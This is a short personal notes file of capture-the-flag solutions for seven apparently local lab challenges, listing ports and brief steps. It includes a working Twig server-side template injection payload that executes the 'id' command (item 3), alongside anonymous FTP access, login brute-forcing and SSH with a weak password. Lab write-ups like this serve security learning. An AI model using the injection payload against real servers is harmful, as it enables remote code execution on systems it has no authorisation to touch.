#############################
SOLUTIONS FOR EACH CHALLENGES
#############################

_____________________________________________________________

1.Grades Day, Grades Day Bonus (sharp_pare)
- port: 8444
- Homepage -> view sources -> logins.txt"
- Decode Admin's credential to receive the required cookie

_____________________________________________________________

2. Math (crazy_spence)
- port: 9999
- python3 /home/khoi/Desktop/loesung.py


_____________________________________________________________

3.Cakes (agitated_ride)
- port: 8443
- /robots.txt
- http://localhost:8444/index.php?hname={{_self.env.registerUndefinedFilterCallback(%22exec%22)}}{{_self.env.getFilter(%22id%22)}}


_____________________________________________________________

4. Challenge 4 (xenodochial_wu) 
- port: 8080


_____________________________________________________________

5. Files Flying (vigilant_napier)
- port: 21 FTP
- ftp localhost
- Name: anonymous
- get flag.txt
- ftp> get flag.txt /home/khoi/Desktop/flag.txt


_____________________________________________________________

6. job hunting (admiring_grothendieck)
- port:8555
- http://localhost:8555/login.php
- Bruteforcing


_____________________________________________________________

7. blissful_wilson: ssh
- port 22
- ssh-keygen -f '/home/khoi/.ssh/known_hosts' -R 'localhost'
- ssh developer@localhost -p 22
- love

